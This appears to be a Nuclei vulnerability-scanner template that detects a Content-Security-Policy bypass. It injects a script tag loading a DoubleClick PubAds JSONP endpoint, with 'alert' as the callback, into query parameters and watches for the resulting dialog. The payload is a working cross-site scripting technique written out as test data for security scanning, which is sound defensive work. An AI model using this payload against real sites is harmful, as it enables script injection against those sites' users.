id: doubleclick-pubads-csp-bypass
info:
name: Content-Security-Policy Bypass - DoubleClick PubAds
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,doubleclick-pubads,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "doubleclick.net"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: doubleclick_pubads_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://pubads.g.doubleclick.net/gampad/ads?gdfp_req=1&output=json_html&callback=alert&impl=fifs&json_a=1&iu_parts=4215%2Cimdb2.consumer.homepage&enc_prev_ius=%2F0%2F1%2C%2F0%2F1&prev_iu_szs=1008x150%7C1008x200%7C1008x30%7C970x250%7C9x1%2C300x250%7C11x1&cust_params=fv%3D1%26ab%3Df%26bpx%3D1%26c%3D1%26s%3D3075%252C32%26u%3D142752923777%26oe%3Dutf-8"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "doubleclick_pubads_csp_xss == true"
# digest: 4b0a00483046022100aaf23311cbadde11894316863778cc17718ef6d11d669e8768614cf4ff914333022100975f8ce4555a1b478a6e2553d5e1d65a86c60dca5d331937dd16058738c9bb27:922c64590222798bb761d5b6d8e72950